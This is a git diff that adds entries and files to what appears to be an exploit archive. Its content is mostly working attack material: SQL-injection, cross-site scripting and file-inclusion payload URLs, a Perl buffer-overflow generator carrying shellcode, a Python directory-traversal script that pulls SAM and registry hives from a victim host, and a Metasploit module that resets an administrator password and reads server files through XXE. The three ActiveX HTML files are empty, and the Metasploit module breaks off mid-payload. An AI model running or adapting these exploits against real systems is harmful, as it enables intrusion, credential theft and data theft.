diff --git a/files.csv b/files.csv
index 765b7593f..fb9675508 100755
--- a/files.csv
+++ b/files.csv
@@ -30107,3 +30107,19 @@ id,file,description,date,author,platform,type,port
33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
+33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 'login.php' Multiple SQL Injection Vulnerabilities",2009-12-18,R3d-D3V!L,php,webapps,0
+33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
+33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
+33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
+33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
+33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
+33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80
+33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 'proxy.php' Cross Site Scripting Vulnerability",2009-12-22,"Edgard Chammas",php,webapps,0
+33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 'MSP' Script Cross Site Scripting Vulnerability",2009-12-23,"Floyd Fuh",multiple,webapps,0
+33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 'myps.php' Cross Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
+33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
diff --git a/platforms/hardware/remote/33423.txt b/platforms/hardware/remote/33423.txt
new file mode 100755
index 000000000..ea8bb96c3
--- /dev/null
+++ b/platforms/hardware/remote/33423.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37432/info
+
+The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+
+The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33438.txt b/platforms/multiple/webapps/33438.txt
new file mode 100755
index 000000000..87e4e2c4e
--- /dev/null
+++ b/platforms/multiple/webapps/33438.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37451/info
+
+webMathematica is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/webMathematica/MSP\
diff --git a/platforms/php/webapps/33421.txt b/platforms/php/webapps/33421.txt
new file mode 100755
index 000000000..2494d5fb1
--- /dev/null
+++ b/platforms/php/webapps/33421.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37417/info
+
+Ampache is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ampache 3.4.3 is vulnerable; other versions may also be affected.
+
+The following data is available:
+
+username : x' or ' 1=1
+password : x' or ' 1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33422.txt b/platforms/php/webapps/33422.txt
new file mode 100755
index 000000000..6cd82d4fc
--- /dev/null
+++ b/platforms/php/webapps/33422.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37423/info
+
+JBC Explorer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JBC Explorer 7.20 is vulnerable; other versions may also be affected.
+
+http://www.example.com/album/dirsys/arbre.php?0=search&last=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33424.txt b/platforms/php/webapps/33424.txt
new file mode 100755
index 000000000..2e3a7382b
--- /dev/null
+++ b/platforms/php/webapps/33424.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37435/info
+
+Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?module=[target]&do=View&id=">
+
+http://www.example.com/index.php?module=[target]&do=">
+
+http://www.example.com/index.php?module=Account&do=UserInfo&uname=">
diff --git a/platforms/php/webapps/33435.txt b/platforms/php/webapps/33435.txt
new file mode 100755
index 000000000..b49257936
--- /dev/null
+++ b/platforms/php/webapps/33435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37446/info
+
+ClarkConnect Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ClarkConnect Linux 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com:82/public/proxy.php?url=
\ No newline at end of file
diff --git a/platforms/php/webapps/33436.txt b/platforms/php/webapps/33436.txt
new file mode 100755
index 000000000..a8be96230
--- /dev/null
+++ b/platforms/php/webapps/33436.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/33437.txt b/platforms/php/webapps/33437.txt
new file mode 100755
index 000000000..76eaea02a
--- /dev/null
+++ b/platforms/php/webapps/33437.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/33439.txt b/platforms/php/webapps/33439.txt
new file mode 100755
index 000000000..12e6130f4
--- /dev/null
+++ b/platforms/php/webapps/33439.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37464/info
+
+MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MyBB 1.4.10 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/myps.php?action=donate&username="/>
+
+http://www.example.com/myps.php?action=donate&username=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33440.txt b/platforms/php/webapps/33440.txt
new file mode 100755
index 000000000..be6e0b252
--- /dev/null
+++ b/platforms/php/webapps/33440.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37473/info
+
+The iF Portfolio Nexus ('com_if_nexus') component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+The following example URI is available:
+
+http://www.example.com/[Yol]/index.php?option=com_kif_nexus&controller=[-LFI-]
+
+
diff --git a/platforms/windows/local/33426.pl b/platforms/windows/local/33426.pl
new file mode 100755
index 000000000..bc3a1dc39
--- /dev/null
+++ b/platforms/windows/local/33426.pl
@@ -0,0 +1,89 @@
+#!/usr/bin/perl
+
+######################################################################################################
+# Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
+# Discovery date: 11-26-2013
+# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
+# Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0
+# Vendor Site: http://www.cyberlink.com/
+# Tested On: Windows XP SP3
+# Timeline:
+# -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details
+# -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor
+# -- 12/11/13: Vendor response indicating issue has been escalated to Development team
+# -- 12/17/13: Vendor response indicating RD team working on fix
+# -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development
+# -- 03/07/13: Vendor response indicating someone from Development would contact for more details
+# -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28
+# -- 03/16/14: Additional details provided to vendor as requested
+# -- 04/06/14: Status update requested from vendor
+# -- 04/08/14: New build released, provided for testing; confirmed fix for this issue
+# Details:
+# -- Power2Go uses registry keys to set various attributes including the registered username
+# -- The registered username is loaded into memory for display when the "About" screen is opened
+# -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0
+# -- It loads these values into memory without proper bounds checks which enables the exploit
+# To Exploit:
+# -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner
+# -- Once the registry has been modified, this exploit will be persistent and execute every time
+# -- the application is run and the "About" screen is opened
+######################################################################################################
+
+my $buffsize = 50000; # sets buffer size for consistent sized payload
+
+# construct the required start and end of the reg file
+my $regfilestart ="Windows Registry Editor Version 5.00\n\n";
+$regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n";
+$regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable
+
+my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh
+my $nseh = "\x61\x62"; # overwrite next seh with popad + nop
+my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret
+
+# unicode venetian alignment
+my $venalign = "\x6e";
+$venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes)
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x50"; # push eax
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\xc3"; # ret
+
+my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode
+
+# Calc.exe payload
+# msfpayload windows/exec CMD=calc.exe R
+# alpha2 unicode/uppercase
+my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA".
+"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
+"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
+"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
+"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
+"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
+"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
+"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
+"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
+"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
+"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
+"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
+"QQ2LRCM0LJA";
+
+my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
+my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
+my $buffer = $sploit.$fill; # assemble the final buffer
+
+my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry
+my $regfile = $regfilestart . "\"". $buffer . "\"";
+
+# write the exploit buffer to file
+my $file = "cyberlinkp2g9_bof.reg";
+open(FILE, ">$file");
+print FILE $regfile;
+close(FILE);
+print "Exploit file [" . $file . "] created\n";
+print "Buffer size: " . length($buffer) . "\n";
diff --git a/platforms/windows/remote/33431.html b/platforms/windows/remote/33431.html
new file mode 100755
index 000000000..2a6c47b0a
--- /dev/null
+++ b/platforms/windows/remote/33431.html
@@ -0,0 +1,55 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/33432.html b/platforms/windows/remote/33432.html
new file mode 100755
index 000000000..36332085b
--- /dev/null
+++ b/platforms/windows/remote/33432.html
@@ -0,0 +1,56 @@
+
+
+
+
+
+
diff --git a/platforms/windows/remote/33433.html b/platforms/windows/remote/33433.html
new file mode 100755
index 000000000..d9b986dbf
--- /dev/null
+++ b/platforms/windows/remote/33433.html
@@ -0,0 +1,54 @@
+
+
+
+
diff --git a/platforms/windows/webapps/33428.py b/platforms/windows/webapps/33428.py
new file mode 100755
index 000000000..565daa628
--- /dev/null
+++ b/platforms/windows/webapps/33428.py
@@ -0,0 +1,63 @@
+#!/usr/bin/python
+#
+# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal
+# Date: 04/28/2014
+# Exploit Author: Matt Schmidt (Syph0n)
+# Vendor Homepage: http://www.safenet-inc.com/
+# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe
+# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3
+# Tested on: Windows 7 and Windows XP SP2
+# CVE: CVE-2007-6483
+# Dork: intitle:"Sentinel Keys License Monitor"
+# Greets to norsec0de
+
+import sys, urllib2, argparse
+
+print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
+print '[+] Written by Matt Schmidt (Syph0n)'
+print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
+print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
+
+
+# Define Help Menu
+if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
+ print 'Usage:'
+ print './exploit.py --host [options]'
+ print ' : The victim host\n'
+ print ' Options:'
+ print ' --port The port the application is listening on (default: 7002)'
+ print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
+ sys.exit(1)
+
+# Parse Arguments
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required = True)
+parser.add_argument('--port', type = int, default = 7002)
+parser.add_argument('--file')
+args = parser.parse_args()
+
+# Define Variables
+host = args.host
+port = args.port
+if args.file is not None :
+ targetFile = [args.file]
+else:
+ targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
+
+# Send Exploit
+print '[+] Sending exploit!'
+
+# Loop for multiple files
+for path in targetFile:
+ # Define Directory Traversal path
+ url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)
+
+ # Retrieve file(s)
+ exploit = urllib2.urlopen(url)
+ header = exploit.info()
+ size = int(header.getheaders("Content-Length")[0])
+ print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)
+ filename = url.rsplit('/',1)
+ with open(str(filename[1]), "wb") as contents:
+ contents.write(exploit.read())
+print '\n[+] Done!\n'
\ No newline at end of file
diff --git a/platforms/windows/webapps/33434.rb b/platforms/windows/webapps/33434.rb
new file mode 100755
index 000000000..8627d810c
--- /dev/null
+++ b/platforms/windows/webapps/33434.rb
@@ -0,0 +1,298 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Release Control Authenticated XXE',
+ 'Description' => %q{
+ This module take advantage of three separate vulnerabilities in order to
+ read an arbitrary text file from the file system with the privileges
+ of the web server. You must be authenticated, but can be unprivileged
+ since a privilege escalation vulnerability is used. Tested against
+ HP Release Control 9.20.0000, Build 395 installed with demo data.
+
+ The first vulnerability allows an unprivileged authenticated user to list
+ the current users, their IDs, and even their password hashes. Can't login
+ with hashes, but the ID is useful in the second vulnerability.
+
+ When a user changes their password, they post the ID of the user who
+ is going to have their password changed. Just replace it with the
+ admin ID and you change the admin password. You are now admin.
+
+ The third vulnerability is an XXE in the dashboard XML import mechanism.
+ This is what allows you to read the file from the file system.
+
+ This module is super ghetto half because it was an AMF application,
+ half because I worked on it longer than I wanted to.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brandon Perry '
+ ],
+ 'References' =>
+ [
+ ],
+ 'DisclosureDate' => 'May 16 2014'
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "Base directory path", '/']),
+ OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
+ OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
+ OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
+ ], self.class)
+ end
+
+ def check
+ end
+
+ def run
+ print_status("Authenticating")
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ cookie = res.get_cookies
+
+ post = {
+ 'j_username' => datastore['USERNAME'],
+ 'j_password' => datastore['PASSWORD'],
+ 'buttonName' => ''
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ if res and res.headers['Location'] !~ /index.jsp/
+ fail_with("Authentication failed")
+ end
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
+ 'cookie' => cookie
+ })
+
+ cookie = cookie + res.get_cookies
+
+ #not sure why this always fails the first time. Whatever.
+ id = nil
+ while id == nil
+ id = get_admin_id(cookie)
+ end
+
+ print_status("Found admin id: " + id)
+ print_status("Changing admin's password...")
+
+ password = change_admin_password(cookie, id)
+ print_status("Changed admin password to: " + password)
+
+ post = {
+ 'j_username' => 'admin',
+ 'j_password' => password,
+ 'buttonName' => ''
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ if res.headers['Location'] !~ /index.jsp/
+ fail_with("Login failed")
+ end
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
+ 'cookie' => cookie
+ })
+
+ cookie = cookie + res.get_cookies
+
+ post = {
+ 'com.mercury.dashboard.screen_resolution_width' => 2560,
+ 'com.mercury.dashboard.arch.fieldtree.date.timeZone' => 300,
+ 'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser' => 1400274351481
+ }
+
+ #need to send this so that the next request doesn't fail
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'portal', 'PageView.jsp'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ print_status("Exploiting XXE...")
+
+ data = Rex::Text::decode_base64("-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name="com.mercury.dashboard.arch.fieldtree.formForFieldtree."

Y
-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".importFromFile"; filename="Dashboard_Objects_Export_20140514.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<ExportList xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><version>2</version><Module><name>Release Control Default Module</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</uuid><description>&xxe;</description><enabled>true</enabled><allowSelfService>false</allowSelfService><copiable>true</copiable><allUsersAccess>true</allUsersAccess><page><pageSequence>0</pageSequence><title>Trends</title><portlet><title>Latent Changes Over Time</title><portletDefinitionUuid>3b7bb6aa02977f5c:6940210b:1163bcb394a:-7fdf</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294918][Latent]</value></value></preferenceValue><preferenceValue><name>Group By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>2</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Abnormal Changes Over Time</title><portletDefinitionUuid>329c812c51783e9e:6a9520f3:11639817da2:-7feb</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294912][Any]</value></value></preferenceValue><preferenceValue><name>Group By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>1</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Changes Over Time</title><portletDefinitionUuid>329c812c51783e9e:6a9520f3:11639817da2:-7fec</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294912][Any]</value></value></preferenceValue><preferenceValue><name>Group By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>0</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><autoRefresh>false</autoRefresh><refreshInterval>0</refreshInterval></page><page><pageSequence>1</pageSequence><title>Analysis</title><portlet><title>Application Severity Distribution</title><portletDefinitionUuid>586dc58af49e2f4e:ff9805:10a60813037:-8000</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Request Status</name><value><sequence>0</sequence><value>[PENDING_APPROVAL][Pending
							Approval]</value></value></preferenceValue><preferenceValue><name>User Applications</name><value><sequence>0</sequence><value>[Y][Yes]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>0</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Change Request Impact Analysis Ratio</title><portletDefinitionUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffe</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Request Status</name><value><sequence>0</sequence><value>[PENDING_APPROVAL][Pending
							Approval]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>2</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Application Status Distribution</title><portletDefinitionUuid>586dc58af49e2f4e:ff9805:10a60813037:-7fff</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>User Applications</name><value><sequence>0</sequence><value>[Y][Yes]</value></value></preferenceValue><preferenceValue><name>Time Frame</name><value><sequence>0</sequence><value>[Last Month][Last Month]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>1</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><autoRefresh>false</autoRefresh><refreshInterval>0</refreshInterval></page><page><pageSequence>2</pageSequence><title>Post Implementation</title><portlet><title>Outcome Over Time</title><portletDefinitionUuid>6a3673c9feb76dcb:-36256166:1172b2915a2:-7ff4</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294920][Closed]</value></value></preferenceValue><preferenceValue><name>Group By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>0</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Outcome Grouped By 